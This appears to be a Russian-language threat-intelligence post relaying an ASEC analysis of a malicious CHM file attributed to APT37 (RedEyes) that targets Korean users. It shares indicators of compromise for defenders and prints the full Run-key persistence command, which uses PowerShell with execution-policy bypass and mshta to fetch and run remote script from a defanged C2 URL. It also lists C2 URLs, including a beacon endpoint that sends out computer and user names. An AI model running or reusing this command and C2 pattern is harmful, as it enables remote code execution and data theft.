APT37 (RedEyes) IOCs - Part 2

security IOC

Аналитическая группа ASEC (AhnLab Security Emergency response Center) обнаружила, что вредоносная программа CHM, которая, как предполагается, была создана угрожающей группой RedEyes (также известной как APT37, ScarCruft), распространяется среди корейских пользователей. Команда подтвердила, что команда, используемая на этапе "2.3. Стойкость" вредоносной атаки M2RAT группы RedEyes, о которой сообщалось еще в феврале, имеет тот же формат, что и команда, используемая в этой атаке.

APT37 (RedEyes)

Когда CHM-файл выполняется, он отображает экран справки, замаскированный под письмо безопасности от корейской финансовой компании. Вредоносный скрипт, находящийся в CHM, активируется во время этого процесса, поэтому пользователям трудно его заметить. В последнее время наблюдается рост распространения вредоносных программ с использованием CHM.

Выполняемый вредоносный скрипт показан ниже, и, как и другие вредоносные программы CHM, представленные в прошлом, он также использует объект ярлыка (ShortCut). Объект ярлыка вызывается с помощью метода Click, и выполняется команда под записью Item1. Этот файл выполняет дополнительный скрипт, существующий в определенном URL, через процесс mshta.

Выполняемая команда

Файл "1.html", выполняемый процессом mshta, содержит JS (JavaScript) код. Этот код отвечает за выполнение закодированных команд PowerShell. Выполняемая здесь команда PowerShell имеет схожий формат с командой, используемой во время вышеупомянутой атаки M2RAT.

Изучение декодированной команды PowerShell показало, что все, кроме адреса C2, имени файла, под которым сохраняются результаты выполнения команды, и значения реестра, имеет тот же код, что и команда, использованная в феврале. Эта команда отвечает за регистрацию ключа RUN для установления постоянства, получение команд с сервера угрожающего агента и передачу результатов выполнения команд.

Регистрация ключа RUN
Путь к реестру: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Имя значения: icxrNpVd
Значение: c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 361881 2.2.2.2 || mshta hxxp://shacc[.]kr/skin/product/1.html

При заражении системы этим типом вредоносного ПО системе может быть нанесен значительный ущерб, поскольку это вредоносное ПО способно выполнять различные вредоносные действия, такие как загрузка файлов и вымогательство информации в соответствии с командами агента угрозы. В частности, вредоносные программы, нацеленные на конкретных пользователей в Корее, могут содержать контент на интересующие пользователя темы, чтобы побудить его выполнить вредоносное ПО, поэтому пользователям следует воздерживаться от открытия электронных писем из неизвестных источников и не выполнять их вложения. Пользователи также должны регулярно проверять свои компьютеры и обновлять свои продукты безопасности до последней версии.

Indicators of Compromise

URLs

  • http://shacc.kr/skin/product/1.html
  • http://shacc.kr/skin/product/mid.php?U=[Computer name]+[Username]
  • http://shacc.kr/skin/product/mid.php?R=[BASE64-encoded]

MD5

  • 806fad8aac92164f971c04bb4877c00f
  • 8d2eebd10d90953cfada64575328ae24
Avatar for Gnostis
Gnostis
SEC-1275-1
Добавить комментарий